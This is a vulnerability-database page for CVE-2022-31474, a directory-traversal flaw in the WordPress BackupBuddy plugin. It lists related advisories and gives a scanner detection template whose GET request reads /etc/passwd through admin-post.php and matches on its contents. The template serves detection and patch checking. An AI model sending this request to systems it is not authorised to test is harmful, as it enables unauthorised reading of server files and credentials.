| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| WordPress BackupBuddy 8.7.4.1 Arbitrary File Read Vulnerability | 8 Sep 202200:00 | – | zdt | |
| CVE-2022-31474 | 13 Mar 202314:15 | – | attackerkb | |
| CVE-2022-31474 | 9 Sep 202211:10 | – | circl | |
| WordPress plugin BackupBuddy 路径遍历漏洞 | 7 Sep 202200:00 | – | cnnvd | |
| WordPress BackupBuddy Plugin Arbitrary File Read (CVE-2022-31474) | 12 Sep 202200:00 | – | checkpoint_advisories | |
| CVE-2022-31474 | 13 Mar 202313:21 | – | cve | |
| CVE-2022-31474 WordPress BackupBuddy Plugin 8.5.8.0-8.7.4.1 is vulnerable to Directory Traversal | 13 Mar 202313:21 | – | cvelist | |
| Zero-day Vulnerability in the WordPress BackupBuddy Plugin | 14 Sep 202214:32 | – | hivepro | |
| BackupBuddy WordPress plugin vulnerable to exploitation, update now! | 13 Sep 202212:00 | – | malwarebytes | |
| CVE-2022-31474 | 13 Mar 202314:15 | – | nvd |
id: CVE-2022-31474
info:
name: BackupBuddy - Local File Inclusion
author: aringo
severity: high
description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.
impact: |
An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
remediation: Upgrade to at least version 8.7.5 or higher
reference:
- https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
- https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
- https://ithemes.com/backupbuddy/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
- https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-31474
cwe-id: CWE-22
epss-score: 0.63761
epss-percentile: 0.99119
cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: ithemes
product: backupbuddy
framework: wordpress
tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022002e3383b69fd3b44a66c62c91c1fc7632c98ad1b20c065ea3dc1659ac8ec226f022100adfc7d15de79b1688354eb915d5c29d0773a44c526e02df3230e5bb809af14d7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation